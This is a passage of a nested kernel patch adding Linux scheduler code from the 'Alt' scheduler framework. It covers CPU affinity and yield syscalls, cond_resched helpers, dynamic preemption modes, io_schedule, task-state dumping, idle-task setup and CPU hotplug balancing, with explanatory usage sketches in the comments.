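++ *	if (sched_setaffinity(0, sizeof(set), &set))
++ *		perror("sched_setaffinity");
++ */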
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
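++
++/*
++ * Note for user-space: the raw syscall returns the number of bytes
++ * copied (retlen above); the glibc wrapper hides that and returns 0
++ * on success:
++ *
++ *	cpu_set_t set;
++ *
++ *	if (!sched_getaffinity(0, sizeof(set), &set))
++ *		printf("%d CPUs allowed\n", CPU_COUNT(&set));
++ */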
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (sched_yield_type == 1) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (sched_yield_type == 2) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
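++
++/*
++ * Typical in-kernel usage sketch: a long loop sprinkles cond_resched()
++ * so that, on non-preemptible kernels, other tasks can run and RCU can
++ * observe a quiescent state:
++ *
++ *	for (i = 0; i < nr_items; i++) {
++ *		process_item(&items[i]);	// hypothetical helper
++ *		cond_resched();
++ *	}
++ */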
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
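++
++/*
++ * Usage sketch: doing a long batch of work under a spinlock while
++ * periodically giving the lock (and the CPU) away. A return value of 1
++ * means the lock was dropped and reacquired, so any state derived under
++ * the lock must be revalidated:
++ *
++ *	spin_lock(&lock);
++ *	while (more_work()) {		// hypothetical helpers
++ *		do_one_chunk();
++ *		if (cond_resched_lock(&lock))
++ *			revalidate_state();
++ *	}
++ *	spin_unlock(&lock);
++ */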
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run; if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
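++
++/*
++ * The recommended replacement for the broken pattern shown above: sleep
++ * until the condition is true instead of spinning on yield() (sketch,
++ * assuming a wait_queue_head_t wq and a waker doing
++ * "event = true; wake_up(&wq);"):
++ *
++ *	wait_event(wq, event);
++ */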
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In the Alt scheduler framework, yield_to() is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
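++
++/*
++ * Usage sketch: io_schedule_prepare()/io_schedule_finish() bracket code
++ * that may sleep more than once while still being accounted as iowait
++ * (this is essentially what mutex_lock_io() does):
++ *
++ *	int token = io_schedule_prepare();
++ *
++ *	mutex_lock(&mutex);		// may sleep, counted as iowait
++ *	...
++ *	mutex_unlock(&mutex);
++ *	io_schedule_finish(token);
++ */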
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
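++
++/*
++ * Illustrative user-space sketch: querying the valid static priority
++ * range before calling sched_setscheduler():
++ *
++ *	int max = sched_get_priority_max(SCHED_FIFO);	// 99 here
++ *	int min = sched_get_priority_min(SCHED_FIFO);	// 1 here
++ */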
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
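++
++/*
++ * Illustrative user-space sketch; under this scheduler every task
++ * reports the same default timeslice:
++ *
++ *	struct timespec ts;
++ *
++ *	if (!sched_rr_get_interval(0, &ts))
++ *		printf("timeslice: %ld ns\n", ts.tv_nsec);
++ */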
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++#ifdef CONFIG_SMP
++	struct affinity_context ac = (struct affinity_context) {
++		.new_mask  = cpumask_of(cpu),
++		.flags     = 0,
++	};
++#endif
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, &ac);
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE, i.e. when !cpu_active(), but it
++ * only takes effect while the CPU is going down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPU's hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
